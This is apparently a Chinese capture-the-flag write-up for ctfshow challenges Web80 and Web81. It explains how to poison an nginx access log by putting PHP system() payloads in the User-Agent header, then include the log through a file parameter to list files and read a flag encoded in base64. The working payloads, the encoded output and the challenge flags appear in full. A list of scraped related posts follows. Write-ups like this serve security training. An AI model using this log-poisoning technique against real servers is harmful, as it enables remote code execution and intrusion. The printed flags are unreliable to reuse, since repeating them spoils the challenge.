ctfshow 日志包含Web80-81
2022/4/16
题目过滤了php和data,我们这次要用日志文件包含
先抓包
nginx日志的默认路径为/var/log/nginx.
ssh日志的默认路径为/var/log/auth.log
SSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述
现在要将恶意代码写入日志文件
/?file=/var/log/nginx/access.log
<?php system(ls); ?>
得到fl0g.php
在User-Agent中输入
<?php system('base64 fl0g.php');?>
得到flag的base64编码
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMToyNDozNw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTE6MjU6MDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s4Mzc4ZGVhZC1kYzQxLTRmNDctYTY5ZS01MmVkZDY1MjEwZjd9Ijs=
解码后得到
ctfshow{8378dead-dc41-4f47-a69e-52edd65210f7}
Web81
多过滤了:
/?file=/var/log/nginx/access.log
<?php system(ls); ?>
在User-Agent中输入
<?php system('base64 fl0g.php');?>
ctfshow{95544252-d2bb-4a39-96f8-26d34164996e}
ctfshow 日志包含Web80-81相关推荐
- CTFshow 文件包含 web80
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
- CTFshow 文件包含 web81
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
- 通过日志恢复oracle序列,(存档日志包含序列84,要求序列36)怎么恢复啊?
(存档日志包含序列84,要求序列36)怎么恢复啊? SQL> startup mount; ORACLE 例程已启动 Total System Global Area 135338868 by ...
- 渗透测试-中间件日志包含绕过和php文件读写包含
中间件日志包含绕过 文章目录 中间件日志包含绕过 前言 一.什么是中间件日志包含绕过 二.中间件日志包含漏洞获取shell 1.中间件日志包含 2.利用Apache日志获取shell 总结 前言 一. ...
- ctfshow 文件包含Web78-79
Ctfshow文件包含漏洞 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件.如果文件中存在恶意代码,无论文件是什么类型 ...
- ctfshow 文件包含 web 78 -117
目录 web 78 web 79 web 80 web 81 web 82-86(环境暂时做不了) web 87 web 88 web 116 web 117 web 78 data://text/p ...
- CTFshow 文件包含 web82
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # ...
- 尚未备份数据库 *** 的日志尾部。如果该日志包含您不希望丢失的工作,请使用 BACKUP LOG WITH NORECOVERY 备份该日志。...
使用SQL Server 2005还原备份的数据库文件时出现的问题,如题. 前提:如果你有个数据库的.bak的备份文件. 右键点击 数据库任务-->还原-->数据库 1.还原的目标选择你要 ...
- CTFshow 文件包含 web117
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # ...
- CTFshow 文件包含 web116
目录 源码 思路 题解 总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题
最新文章
- 信息安全的一些东西,初步查询了解!
- python如何自学模块_跟老齐学Python之Import 模块
- ASPJPEG图片处理组件安装和使用问题
- python退出循环快捷_python退出循环的方法
- select_arg_from_python相关的测试程序
- iis vue history 配置_Vue实战——vueRouter路由的添加与配置
- (原创)eCos驱动分析 之 ISR是如何与硬件中断联系起来的?
- 最长非下降子序列(O(nlogn))(offer收割)
- 多线程中 start()和run()方法的区别
- poj 2387 Til the Cows Come Home dijkstra
- 大端和小端存储模式解析
- 网吧技术员应聘问卷你能答多少
- php中清除文本框,php如何清除文本框
- 电脑问题处理篇4:解决华硕电脑“ASUS Battery Health Charging”软件界面呈现灰色不能选择充电模式的问题
- 2018年的25个最佳数据可视化
- sublime 集成 markdown 插件【小明同学】
- 对神经网络的简单理解,简述什么是神经网络
- 中小企业进行工业互联网改革的痛点和解决方案
- 从比特保存和信息保存看数字资源长期保存
- LDAPBrowser
热门文章
- UVA - 10827 Maximum sum on a torus
- 计算机知识大赛五书,2017昆山千灯镇事业单位考试常识——昆山市情解析
- 真正免费的天气API,无需注册申请key
- MBR15200FAC-ASEMI插件肖特基二极管MBR15200FAC
- class path resource [applicationContext.xml] cannot be opened because it does not exist,jar包缺失
- 交换机putty怎么调试_debian10使用putty配置交换机console口
- abp ddd mysql_初识ABP vNext(1):开篇计划基础知识
- SAS逻辑回归之多分类
- 曲线积分于曲面积分(后篇 曲面积分-坐标曲面积分-高斯公式-斯托克斯公式)
- SpringCloud 微服务网关Gateway常用限流算法以及简单实现